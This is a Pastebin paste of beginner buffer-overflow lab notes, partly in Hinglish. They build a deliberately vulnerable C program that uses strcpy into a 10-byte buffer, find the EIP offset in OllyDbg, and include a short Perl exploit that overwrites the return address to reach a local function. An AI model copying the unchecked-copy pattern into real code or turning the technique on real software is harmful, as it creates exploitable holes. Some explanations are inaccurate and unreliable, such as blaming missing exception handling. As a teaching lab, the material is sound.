Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Buffer Overflow
- It is the condition when the developer did not deployed proper exception handeling. Which let an attacker to change the EIP of the application with the address of any malicious code.
- EIP is our return address which is very critical for the application. We as an attacker try to pass very much amount of data, which exceedes the limit of our buffer and results in overwriting the EIP(return address) of the application.
- Requirement
- 1. Windows OS
- 2. OllyDBG
- 3. Vulnerable Application --> Custom Based(we will create)
- C compiler --> DevCPP 4.9.9.2
- 4. Perl --> For creating an exploit
- nmap -sS -sC -sV 192.168.0.1
- 0 1 2 3 4
- argc and argv[]
- argc ---> number of arguments
- argv[] -> contains the value of arguments
- argv[0] -> nmap
- argv[1] -> -sS
- argv[2] -> -sC
- argv[3] -> -sV
- argv[4] -> 192.168.0.1
- code.c
- ======
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- int overflow(char * s)
- {
- char buffer[10]; //this is our buffer
- strcpy(buffer,s); //vulnerable code
- return 0;
- }
- exploit()
- {
- printf("Buffer Overflow Chal gya....\n");
- }
- int main(int argc, char *argv[])
- {
- int a = 0;
- printf("Aap log main wale function me ho.....\n");
- overflow(argv[1]);
- if(a == 1)
- {
- exploit();
- }
- else
- {
- printf("Pappu ka Buffer Overflow fail ho gya hai....\n");
- }
- return 0;
- }
- ==================
- 00401316 |. E8 94FFFFFF CALL goku.004012AF
- 00401316 ---> exploit
- goku.exe LuciferTheMorningStarTheFirstFallenAngel
- crash
- Exception Offset: 6c:61:46:74 --> EIP
- A --> 41
- goku.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- 41414141
- Exception Offset: 41414141
- A A A A
- 00401316 ---> Normal Form
- EIP Always read data in Little Endian Form
- 00401316
- 00 40 13 16
- 16 13 40 00 ----> Little Endian Form
- 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
- goku.exe 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
- Exception Offset: 35376239
- 35376239
- 35 37 62 39
- 39 62 37 35
- 9b75
- 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
- 1e66186a8e7f4a61ebaae3f46ae2 9b75
- A --> 41
- B --> 42
- C --> 43
- D --> 44
- E --> 45
- AAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE
- 42434445
- 45444342
- Exception Offset: 45444342
- vegeta.pl
- =========
- my $junk="\x41" x 28; #28 bit ka junk data
- my $eip="\x16\x13\x40\x00"; #Address of my exploit code
- my $exploit=$junk.$eip; #concatinating the two strings
- print "Buffer Overflow Chalne wala hai....\n";
- system("goku.exe",$exploit);
- print "Goku wale Buffer Overflow ko shadi mubarak ho.....\n";
- https://ufile.io/s6f8v
Add Comment
Please, Sign In to add comment